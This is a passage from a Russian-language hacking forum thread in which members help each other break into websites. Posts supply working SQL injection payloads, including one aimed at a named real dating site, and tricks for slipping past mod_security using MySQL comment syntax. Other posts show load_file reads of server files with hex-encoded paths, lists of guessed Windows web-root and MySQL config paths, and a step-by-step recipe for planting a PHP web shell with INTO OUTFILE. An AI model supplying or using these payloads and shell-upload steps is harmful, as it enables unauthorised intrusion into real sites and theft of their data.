Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    537
    Likes Received:
    200
    Reputations:
    293
    Доброго времени суток, уважаемые форумчане!

    Вы не могли бы помочь мне восполнить пробелы в моих знаниях?-)

    Дело в том, что никак не могу затить шелл через админку(сайт на джумле), так как доступ к установке чего-либо закрыт, редактирование языков и тд тоже, ну и глобальные настройки само собой... Можно только заливать картинки...
    Собственно вопрос: Можно ли каким-либо образом подменить майм-тайп у отправляемого мною шелла, без замены расширения? Дело в том, что инклудов я на сайте не нашел...
    Заранее благодарю за помощь...
     
  2. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    одной подменой mime-type не отделаешься - там еще проверка расширения идет.
     
  3. auth_root

    auth_root Member

    Joined:
    31 Jan 2010
    Messages:
    17
    Likes Received:
    10
    Reputations:
    0
    Не подскажете, как обойти фильтрацию.
    module.php?id=104+union+select+1,version(),3,4--+
    выводит 5.0.91-community
    проверяю
    module.php?id=104+union+select+1,2,version(),3,4+from+information_schema.tables--+
    выводит версию, columns так же
    Когда пытаюсь вывести таблицы table_name перебрасывает на страницу

    column_name так же и из information_schema.columns
    Выводится только table_schema (information_schema.tables/columns), остальное видимо фильтруется.
    Пробовал обойти
    CoLuMn_NaMe
    cOlUmN_nAme
    и т.д.
    c table_name так же. Перебрасывает на 406 Not Acceptable
    Подскажите как обойти фильтрацию.
    Заранее благодарен.
     
  4. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    Так и должно быть и нету тут фильтрации
    module.php?id=104+union+select+1,version(),3,4--+
    Это правильный запрос.
     
    1 person likes this.
  5. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    Что? У него то же самое, он хочет не только версию, но и инфу из inf. schema вытащить
     
  6. auth_root

    auth_root Member

    Joined:
    31 Jan 2010
    Messages:
    17
    Likes Received:
    10
    Reputations:
    0
    попугай прав. Зачем мне одна версия, имя бд и юзер. Мне нужна инфа о таблицах и колонках из information_schema.tables и information_schema.columns
    Фильтруются при запросе column_name и table_name
    table_schema нет, но этого мало. Иначе зачем мне уязвимость?
     
    1 person likes this.
  7. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    2 auth_root

    Mod_Security
    Code:
    module.php?id=104+union+select+1,/*!table_name*/,3,4+from+information_schema.tables 
    
    Code:
    module.php?id=104+union+select+1,/*12345!table_name*/,3,4+from+information_schema.tables
    
    Либо сразу весь запрос загони в комментарии.
     
    #14887 h00lyshit!, 24 Sep 2010
    Last edited: 24 Sep 2010
    5 people like this.
  8. brutos

    brutos Member

    Joined:
    25 Nov 2009
    Messages:
    123
    Likes Received:
    27
    Reputations:
    8
    Есть сайт с mysql, file_priv=Y, нет раскрытия путей... Нужно узнать путь для заливки шелла через sql inj. Система - Windows.
    Есть возможность читать файлы вот так:
    id=-1+union+select+1,2,load_file(0x633a5c626f6f742e696e69),4+--+
    где 0x633a5c626f6f742e696e69 - C:/boot.ini
    Инклуд тоже не нашел, иначе бы в C:/ файл и залил.
    Нужно перебором найти папку с сайтом, но я не знаю, где обычно в Windows-серверах располагают сайты. Наверняка это где-то уже обсуждалось, но не могу найти...
    Или какой файл можно поискать, в котором может быть написано, куда установлен mysql или apache (в C:/ и C:/Program Files искал, но, видимо, их там нет)? Может, еще какие идеи?

    Сталкиваюсь с таким в первый раз, потерялся))
     
  9. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    brutos попробуй

    c:\wwwroot\имя сайта\
    c:\wwwroot\имя сайта\htdocs\
    c:\wwwroot\имя сайта\www\
    c:\wwwroot\htdocs\

    и т.д.
     
    _________________________
    1 person likes this.
  10. brutos

    brutos Member

    Joined:
    25 Nov 2009
    Messages:
    123
    Likes Received:
    27
    Reputations:
    8
    Konqi, спасибо. Пока глухо, буду искать дальше, но уже хоть есть от чего оттолкнуться)
     
  11. auth_root

    auth_root Member

    Joined:
    31 Jan 2010
    Messages:
    17
    Likes Received:
    10
    Reputations:
    0
    Redwood
    Спасибо большое. Помогло. +

    brutos
    C:\WebServers\home\localhost\www
    =)
     
    #14891 auth_root, 24 Sep 2010
    Last edited: 24 Sep 2010
  12. brutos

    brutos Member

    Joined:
    25 Nov 2009
    Messages:
    123
    Likes Received:
    27
    Reputations:
    8
    Ага, смотрел. Ну там явно не Denwer :)
     
  13. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    brutos попробуй те же пути на других дисках, например D:\
     
    _________________________
  14. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    вот из такого что-то выжать можно?

    http://partnervanjedromen.nl/search_result.php?Sex=Female%27&LookingFor=female&DateOfBirth_start=19&DateOfBirth_end=44

    или подскажите где почитать инфу
     
  15. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    http://partnervanjedromen.nl/search_result.php?Sex=Female') and 1=0 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--+&LookingFor=female&DateOfBirth_start=19&DateOfBirth_end=44
     
    2 people like this.
  16. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,185
    Likes Received:
    618
    Reputations:
    690
    пробуй варианты
    C:\Program Files\MySQL\MySQL Server 5.0\data\hostname.err
    C:\Program Files\MySQL\MySQL Server 5.0\data\mysql.log
    C:\Program Files\MySQL\MySQL Server 5.0\data\mysql.err
    C:\Program Files\MySQL\MySQL Server 5.0\data\mysql-bin.log
    C:\Program Files\MySQL\data\hostname.err
    C:\Program Files\MySQL\data\mysql.log
    C:\Program Files\MySQL\data\mysql.err
    C:\Program Files\MySQL\data\mysql-bin.log
    C:\MySQL\data\hostname.err
    C:\MySQL\data\mysql.log
    C:\MySQL\data\mysql.err
    C:\MySQL\data\mysql-bin.log
    C:\Program Files\MySQL\MySQL Server 5.0\my.ini
    C:\Program Files\MySQL\MySQL Server 5.0\my.cnf
    C:\Program Files\MySQL\my.ini
    C:\Program Files\MySQL\my.cnf
    C:\MySQL\my.ini
    C:\MySQL\my.cnf
     
    _________________________
    1 person likes this.
  17. Mirrey

    Mirrey New Member

    Joined:
    10 Sep 2010
    Messages:
    35
    Likes Received:
    1
    Reputations:
    0
    Как залить шелл в InstantCMS? Нигде не могу найти.
     
  18. Vlad3d

    Vlad3d Elder - Старейшина

    Joined:
    18 Jan 2008
    Messages:
    47
    Likes Received:
    54
    Reputations:
    -1
    есть сайт с sql inj, через нее удалось достать логин и пароль администратора, но в админки нет ни единого намека на залифку файлов/картинок и прочего... Так вот, можно ли залить шелл через sql или еще как нибудь ?
    P.S. только начал изучать sql inj нашел много статей интересных, а про шеллы почти ничего нет(только то что можно залить через админку).
     
  19. emillord

    emillord Elder - Старейшина

    Joined:
    20 Jan 2008
    Messages:
    257
    Likes Received:
    444
    Reputations:
    255
    https://forum.antichat.ru/thread43966.html
    Пункт 2.2

    Проверить привилегии на запись можно вот так:
    N - no = нет прав
    Y - yes = есть права
     
    #14899 emillord, 25 Sep 2010
    Last edited: 25 Sep 2010
    4 people like this.
  20. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54
    Попробуй поискать инклюды в админке. Для заливки шелла через инжект Проверь эти пункты:
    1. Экранирование ковычек он же magic_quotes_qpc. Эта шняга должна быть установлена на off в php.ini. Попробуй в любое поле вписать текст 'lol' и если запрос обработается успешно и выведет "lol", то по первому пункту проходит.
    2. Права доступа к счеме mysql. Попробуй вывести что угодно, даже циферки из mysql.user. Пример : UNION SELECT 1,2,3 from mysql.user. Если запрос обработается также как и при UNION SELECT 1,2,3, то по этому пункту тоже проходит.
    3. file_priv. Сперва узнаем через какого юзера мы подключены к бд. Для этого отправляем запрос UNION SELECT user(),2,3. Например нам вывело root@localhost. Теперь проверяем file_priv у нашего юзера - select file_priv,2,3 from mysql.user where user='root' (если magic_quotes_qpc=on, то root заменить на хекс - 0x726F6F74. Соответственно мы тогда не проходим по 1 пункту, но зато можем читать файлы через функцию load_file). Если выдало Y - у нашего юзера есть файл привелигии и мы проходим по этому пункту else не проходим :)
    4. Путь. Мы должны знать полный путь от корня сервера. например: /home/www/site/
    5. Возможность запись в папку. Если не пишется в /home/www/site/ можно попробовать записать в /home/www/site/images/ к примеру.

    Собственно как лить :
    union select 'наш пхп код',2,3 from mysql.user into outfile '/home/www/site/images/lol.php' . Если по всем вышеперечисленным пунктам все ок и вы сделали все правильно, то по адресу http://site/images/lol.php будет лежать наш файлиг. Если что-то непонятно пиши в пм - всегда рад помочь ;)
     
    #14900 ZARO, 25 Sep 2010
    Last edited: 25 Sep 2010
    4 people like this.
Thread Status:
Not open for further replies.